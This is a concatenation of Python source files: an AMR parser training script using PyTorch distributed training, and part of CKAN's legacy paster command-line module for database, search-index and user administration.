"""
def summarize_file_thread(final_path):
bytestring = gzip_bytestring(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
).encode()
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
|
train.py
|
import argparse
import os
import random
import time
from elit.common.util import isdebugging
from elit.utils.log_util import cprint
if os.environ.get('USE_TF', None) is None:
os.environ["USE_TF"] = 'NO' # saves time loading transformers
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from elit.transform.transformer_tokenizer import TransformerSequenceTokenizer
from elit.utils.time_util import CountdownTimer
from amr_parser.adam import AdamWeightDecayOptimizer
from amr_parser.bert_utils import load_bert, BertEncoderTokenizer
from amr_parser.data import Vocab, DataLoader, DUM, END, CLS, NIL, seperate_concept_from_rel
from amr_parser.extract import LexicalMap
from amr_parser.parser import Parser
from amr_parser.postprocess import PostProcessor
from amr_parser.utils import move_to_device
def parse_config():
parser = argparse.ArgumentParser()
parser.add_argument('--tok_vocab', type=str)
parser.add_argument('--lem_vocab', type=str)
parser.add_argument('--pos_vocab', type=str)
parser.add_argument('--ner_vocab', type=str)
parser.add_argument('--concept_vocab', type=str)
parser.add_argument('--predictable_concept_vocab', type=str)
parser.add_argument('--rel_vocab', type=str)
parser.add_argument('--word_char_vocab', type=str)
parser.add_argument('--concept_char_vocab', type=str)
parser.add_argument('--pretrained_file', type=str, default=None)
parser.add_argument('--with_bert', dest='with_bert', action='store_true')
parser.add_argument('--joint_arc_concept', dest='joint_arc_concept', action='store_true')
parser.add_argument('--levi_graph', dest='levi_graph', type=str, default=None)
parser.add_argument('--separate_rel', dest='separate_rel', action='store_true')
parser.add_argument('--extra_arc', dest='extra_arc', action='store_true')
parser.add_argument('--bert_path', type=str, default=None)
parser.add_argument('--word_char_dim', type=int)
parser.add_argument('--word_dim', type=int)
parser.add_argument('--pos_dim', type=int)
parser.add_argument('--ner_dim', type=int)
parser.add_argument('--concept_char_dim', type=int)
parser.add_argument('--concept_dim', type=int)
parser.add_argument('--rel_dim', type=int)
parser.add_argument('--cnn_filters', type=int, nargs='+')
parser.add_argument('--char2word_dim', type=int)
parser.add_argument('--char2concept_dim', type=int)
parser.add_argument('--embed_dim', type=int)
parser.add_argument('--ff_embed_dim', type=int)
parser.add_argument('--num_heads', type=int)
parser.add_argument('--snt_layers', type=int)
parser.add_argument('--graph_layers', type=int)
parser.add_argument('--inference_layers', type=int)
parser.add_argument('--dropout', type=float)
parser.add_argument('--unk_rate', type=float)
parser.add_argument('--epochs', type=int)
parser.add_argument('--max_batches_acm', type=int, default=60000)
parser.add_argument('--train_data', type=str)
parser.add_argument('--dev_data', type=str)
parser.add_argument('--train_batch_size', type=int)
parser.add_argument('--batches_per_update', type=int)
parser.add_argument('--dev_batch_size', type=int)
parser.add_argument('--lr_scale', type=float)
parser.add_argument('--warmup_steps', type=int)
parser.add_argument('--resume_ckpt', type=str, default=None)
parser.add_argument('--ckpt', type=str)
parser.add_argument('--print_every', type=int)
parser.add_argument('--eval_every', type=int)
parser.add_argument('--seed', type=int, default=int(time.time()))
parser.add_argument('--world_size', type=int)
parser.add_argument('--gpus', type=int)
parser.add_argument('--MASTER_ADDR', type=str)
parser.add_argument('--MASTER_PORT', type=str)
parser.add_argument('--start_rank', type=int)
args = parser.parse_args()
if args.levi_graph == 'true' or args.levi_graph == '1':
args.levi_graph = True
print(f'levi_graph = {args.levi_graph}')
return args
def average_gradients(model):
size = float(dist.get_world_size())
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
def update_lr(optimizer, lr_scale, embed_size, steps, warmup_steps):
lr = lr_scale * embed_size ** -0.5 * min(steps ** -0.5, steps * (warmup_steps ** -1.5))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def data_proc(data, queue):
while True:
for x in data:
queue.put(x)
queue.put('EPOCHDONE')
def load_vocabs(args):
vocabs = dict()
vocabs['tok'] = Vocab(args.tok_vocab, 5, [CLS])
vocabs['lem'] = Vocab(args.lem_vocab, 5, [CLS])
vocabs['pos'] = Vocab(args.pos_vocab, 5, [CLS])
vocabs['ner'] = Vocab(args.ner_vocab, 5, [CLS])
vocabs['predictable_concept'] = Vocab(args.predictable_concept_vocab, 5, [DUM, END])
vocabs['concept'] = Vocab(args.concept_vocab, 5, [DUM, END])
vocabs['rel'] = Vocab(args.rel_vocab, 50, [NIL])
vocabs['word_char'] = Vocab(args.word_char_vocab, 100, [CLS, END])
vocabs['concept_char'] = Vocab(args.concept_char_vocab, 100, [CLS, END])
lexical_mapping = LexicalMap()
if args.separate_rel:
seperate_concept_from_rel(vocabs)
bert_encoder = None
if args.with_bert:
bert_tokenizer = BertEncoderTokenizer.from_pretrained(args.bert_path, do_lower_case=False)
# tokenizer = TransformerSequenceTokenizer(args.bert_path, 'token', use_fast=False, do_basic_tokenize=False,
# cls_is_bos=True)
vocabs['bert_tokenizer'] = bert_tokenizer
for name in vocabs:
if name == 'bert_tokenizer':
continue
print((name, vocabs[name].size, vocabs[name].coverage))
return vocabs, lexical_mapping
def main(local_rank, args):
vocabs, lexical_mapping = load_vocabs(args)
bert_encoder = None
if args.with_bert:
bert_encoder = load_bert(args.bert_path)
seed = args.seed
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
random.seed(seed)
torch.cuda.set_device(local_rank)
device = torch.device('cuda', local_rank)
model = Parser(vocabs,
args.word_char_dim, args.word_dim, args.pos_dim, args.ner_dim,
args.concept_char_dim, args.concept_dim,
args.cnn_filters, args.char2word_dim, args.char2concept_dim,
args.embed_dim, args.ff_embed_dim, args.num_heads, args.dropout,
args.snt_layers, args.graph_layers, args.inference_layers, args.rel_dim,
args.pretrained_file, bert_encoder,
device, joint_arc_concept=args.joint_arc_concept, levi_graph=args.levi_graph)
if args.world_size > 1:
torch.manual_seed(seed + dist.get_rank())
torch.cuda.manual_seed_all(seed + dist.get_rank())
random.seed(seed + dist.get_rank())
model = model.cuda(local_rank)
dev_data = DataLoader(vocabs, lexical_mapping, args.dev_data, args.dev_batch_size, for_train=False)
pp = PostProcessor(vocabs['rel'])
weight_decay_params = []
no_weight_decay_params = []
for name, param in model.named_parameters():
if name.endswith('bias') or 'layer_norm' in name:
no_weight_decay_params.append(param)
else:
weight_decay_params.append(param)
grouped_params = [{'params': weight_decay_params, 'weight_decay': 1e-4},
{'params': no_weight_decay_params, 'weight_decay': 0.}]
optimizer = AdamWeightDecayOptimizer(grouped_params, 1., betas=(0.9, 0.999), eps=1e-6)
used_batches = 0
batches_acm = 0
if args.resume_ckpt:
print(f'Resume from {args.resume_ckpt}')
ckpt = torch.load(args.resume_ckpt)
model.load_state_dict(ckpt['model'])
optimizer.load_state_dict(ckpt['optimizer'])
batches_acm = ckpt['batches_acm']
del ckpt
train_data = DataLoader(vocabs, lexical_mapping, args.train_data, args.train_batch_size, for_train=True,
levi_graph=args.levi_graph, extra_arc=args.extra_arc)
train_data.set_unk_rate(args.unk_rate)
debugging = isdebugging()
if debugging:
train_data_generator = iter(train_data)
else:
queue = mp.Queue(10)
train_data_generator = mp.Process(target=data_proc, args=(train_data, queue))
train_data_generator.start()
cprint(f'Model will be saved in [red]{args.ckpt}[/red]')
model.train()
epoch, loss_avg, concept_loss_avg, arc_loss_avg, rel_loss_avg = 0, 0, 0, 0, 0
max_batches_acm = args.max_batches_acm
timer = CountdownTimer(max_batches_acm - batches_acm)
shuffle_siblings = False
while batches_acm < max_batches_acm:
if not shuffle_siblings and batches_acm >= 50000 and train_data.shuffle_siblings:
shuffle_siblings = True
print('Switch to deterministic sibling order')
queue.close()
train_data_generator.terminate()
train_data = DataLoader(vocabs, lexical_mapping, args.train_data, args.train_batch_size, for_train=True,
shuffle_siblings=False, levi_graph=args.levi_graph, extra_arc=args.extra_arc)
train_data.set_unk_rate(args.unk_rate)
queue = mp.Queue(10)
train_data_generator = mp.Process(target=data_proc, args=(train_data, queue))
train_data_generator.start()
if debugging:
batch = next(train_data_generator)
else:
batch = queue.get()
if isinstance(batch, str):
epoch += 1
# print ('epoch', epoch, 'done', 'batches', batches_acm)
else:
batch = move_to_device(batch, model.device)
concept_loss, arc_loss, rel_loss, graph_arc_loss = model(batch)
if args.levi_graph:
if arc_loss > 10:
cprint(f'[red]'
f'WARNING: arc_loss = {float(arc_loss)} exploded! '
f'Please retrain {args.ckpt}'
f'[/red]')
loss = concept_loss + arc_loss
else:
loss = concept_loss + arc_loss + rel_loss
loss /= args.batches_per_update
loss_value = loss.item()
concept_loss_value = concept_loss.item()
arc_loss_value = arc_loss.item()
rel_loss_value = 0 if rel_loss is None else rel_loss.item()
loss_avg = loss_avg * args.batches_per_update * 0.8 + 0.2 * loss_value
concept_loss_avg = concept_loss_avg * 0.8 + 0.2 * concept_loss_value
arc_loss_avg = arc_loss_avg * 0.8 + 0.2 * arc_loss_value
rel_loss_avg = rel_loss_avg * 0.8 + 0.2 * rel_loss_value
loss.backward()
used_batches += 1
if not (used_batches % args.batches_per_update == -1 % args.batches_per_update):
continue
batches_acm += 1
if args.world_size > 1:
average_gradients(model)
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
lr = update_lr(optimizer, args.lr_scale, args.embed_dim, batches_acm, args.warmup_steps)
optimizer.step()
optimizer.zero_grad()
timer.log('Train Epoch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f' % (
epoch, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg), ratio_percentage=False)
if batches_acm % args.print_every == -1 % args.print_every:
# print ('Train Epoch %d, Batch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f'%(epoch, batches_acm, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg))
model.train()
if (
batches_acm > 50000 or args.resume_ckpt is not None) and batches_acm % args.eval_every == -1 % args.eval_every:
# model.eval()
torch.save({'args': args,
'model': model.state_dict(),
'batches_acm': batches_acm,
'optimizer': optimizer.state_dict()},
'%s/epoch%d_batch%d' % (args.ckpt, epoch, batches_acm))
# parse_data(model, pp, dev_data, args.dev_data,
# '%s/epoch%d_batch%d_dev_out' % (args.ckpt, epoch, batches_acm))
# model.train()
queue.close()
train_data_generator.terminate()
def init_processes(local_rank, args, backend='nccl'):
os.environ['MASTER_ADDR'] = args.MASTER_ADDR
os.environ['MASTER_PORT'] = args.MASTER_PORT
dist.init_process_group(backend, rank=args.start_rank + local_rank, world_size=args.world_size)
main(local_rank, args)
if __name__ == "__main__":
args = parse_config()
if not os.path.exists(args.ckpt):
os.mkdir(args.ckpt)
assert len(args.cnn_filters) % 2 == 0
args.cnn_filters = list(zip(args.cnn_filters[:-1:2], args.cnn_filters[1::2]))
if args.world_size == 1 or True:
main(0, args)
exit(0)
mp.spawn(init_processes, args=(args,), nprocs=args.gpus)
|
cli.py
|
# encoding: utf-8
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
import urlparse
from optparse import OptionConflictError
import traceback
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import click
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
from ckan.common import config
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
Print an error message to STDOUT and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
def user_add(args):
'''Add new user if we use paster sysadmin add
or paster user add
'''
if len(args) < 1:
error('Error: you need to specify the user name.')
username = args[0]
# parse args into data_dict
data_dict = {'name': username}
for arg in args[1:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError(
'Could not parse arg: %r (expected "<option>=<value>)"' % arg
)
# Required
while not data_dict.get('email'):
data_dict['email'] = raw_input('Email address: ')
if 'password' not in data_dict:
data_dict['password'] = UserCmd.password_prompt()
# Optional
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(
sys.getfilesystemencoding()
)
print('Creating user: %r' % username)
try:
import ckan.logic as logic
import ckan.model as model
site_user = logic.get_action('get_site_user')({
'model': model,
'ignore_auth': True},
{}
)
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
error(traceback.format_exc())
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
def _get_config(config=None):
from paste.deploy import appconfig
if config:
filename = os.path.abspath(config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
default_filename = 'development.ini'
filename = os.path.join(os.getcwd(), default_filename)
if not os.path.exists(filename):
# give really clear error message for this common situation
msg = 'ERROR: You need to specify the CKAN config (.ini) '\
'file path.'\
'\nUse the --config parameter or set environment ' \
'variable CKAN_INI or have {}\nin the current directory.' \
.format(default_filename)
exit(msg)
if not os.path.exists(filename):
msg = 'Config file not found: %s' % filename
msg += '\n(Given by: %s)' % config_source
exit(msg)
fileConfig(filename)
return appconfig('config:' + filename)
def load_config(config, load_site_user=True):
conf = _get_config(config)
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
registry = Registry()
registry.prepare()
import pylons
registry.register(pylons.translator, MockTranslator())
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
registry.register(pylons.c, c)
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = site_user['name']
pylons.c.userobj = model.User.get(site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def paster_click_group(summary):
'''Return a paster command click.Group for paster subcommands
:param command: the paster command linked to this function from
setup.py, used in help text (e.g. "datastore")
:param summary: summary text used in paster's help/command listings
(e.g. "Perform commands to set up the datastore")
'''
class PasterClickGroup(click.Group):
'''A click.Group that may be called like a paster command'''
def __call__(self, ignored_command):
sys.argv.remove(ignored_command)
return super(PasterClickGroup, self).__call__(
prog_name=u'paster ' + ignored_command,
help_option_names=[u'-h', u'--help'],
obj={})
@click.group(cls=PasterClickGroup)
@click.option(
'--plugin',
metavar='ckan',
help='paster plugin (when run outside ckan directory)')
@click_config_option
@click.pass_context
def cli(ctx, plugin, config):
ctx.obj['config'] = config
cli.summary = summary
cli.group_name = u'ckan'
return cli
# common definition for paster ... --config
click_config_option = click.option(
'-c',
'--config',
default=None,
metavar='CONFIG',
help=u'Config file to use (default: development.ini)')
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _load_config(self, load_site_user=True):
load_config(self.options.config, load_site_user)
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urllib2.urlopen(url).read()
except urllib2.HTTPError, e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - make an existing user into a sysadmin
sysadmin add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- creates a new user that is a sysadmin
(prompts for password and email if not
supplied).
Field can be: apikey
password
email
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s email=%s id=%s' % (
sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.email,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
user_add(self.args[1:])
user = model.User.by_name(unicode(username))
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for email and
password if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state='active')
print 'count = %i' % users.count()
